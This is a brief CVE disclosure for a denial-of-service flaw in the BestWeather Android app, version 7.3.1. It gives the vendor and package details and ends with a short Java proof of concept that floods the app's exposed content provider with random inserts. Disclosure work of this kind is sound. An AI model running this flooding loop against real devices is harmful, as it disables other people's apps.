Headline
CVE-2023-29743: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs
An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause a persistent denial of service attack by manipulating the database.
Denial of Service exists in Alarm Clock for BestWeather(CVE-2023-29743)
Vendor:最美天气(上海)科技有限公司(http://www.zmtqsh.com/)
Affected product:BestWeather(com.icoolme.android.weather)
Version:7.3.1
Download link:https://play.google.com/store/apps/details?id=com.icoolme.android.weather
Description of the vulnerability for use in the CVE:An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause a persistent denial of service attack by manipulating the database.
poc:
private void attack() { while (true) { ContentResolver contentResolver = this.getApplicationContext().getContentResolver(); Uri uri = Uri.parse(“content://com.icoolme.android.weather.provider/EXP”); ContentValues contentValues = new ContentValues(); contentValues.put("name",randomstring); contentResolver.insert(uri,contentValues); } }